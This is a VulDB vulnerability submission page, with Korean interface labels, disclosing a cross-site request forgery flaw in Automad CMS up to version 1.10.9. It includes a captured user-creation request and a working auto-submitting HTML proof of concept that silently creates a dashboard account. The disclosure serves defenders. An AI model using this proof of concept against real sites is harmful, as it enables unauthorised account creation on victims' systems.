제출 #249818: Automad CMS <= 1.10.9 Multiple Cross-Site Request Forgery (CSRF)정보

제목Automad CMS <= 1.10.9 Multiple Cross-Site Request Forgery (CSRF)
설명After observation, it was discovered that the application does not implement CSRF tokens by default, making it vulnerable to CSRF attacks. This impacts the overall functionality of the application. Below is a view of one of the action requests while adding a user: POST /dashboard?controller=UserCollection::createUser HTTP/1.1 Host: automad.scr User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 76 Origin: http://automad.scr Connection: close Referer: http://automad.scr/dashboard?view=System Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211 X-PwnFox-Color: green username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd CSRF HTML: <html> <body> <form action="http://automad.scr/dashboard?controller=UserCollection::createUser" method="POST"> <input type="hidden" name="username" value="User" /> <input type="hidden" name="email" value="User&#64;example&#46;com" /> <input type="hidden" name="password1" value="Passw0rd" /> <input type="hidden" name="password2" value="Passw0rd" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>
원천⚠️ https://github.com/screetsec/VDD/tree/main/Automad%20CMS/Cross-Site%20Request%20Forgery%20(CSRF)
사용자
 Maland (UID 59886)
제출2023. 12. 09. PM 06:15 (3 연령 ago)
모더레이션2023. 12. 21. AM 09:19 (12 days later)
상태수락
VulDB 항목248687 [automad 까지 1.10.9 User Creation dashboard?controller=UserCollection::createUser 교차 사이트 요청 위조]
포인트들20

Do you want to use VulDB in your project?

Use the official API to access entries easily!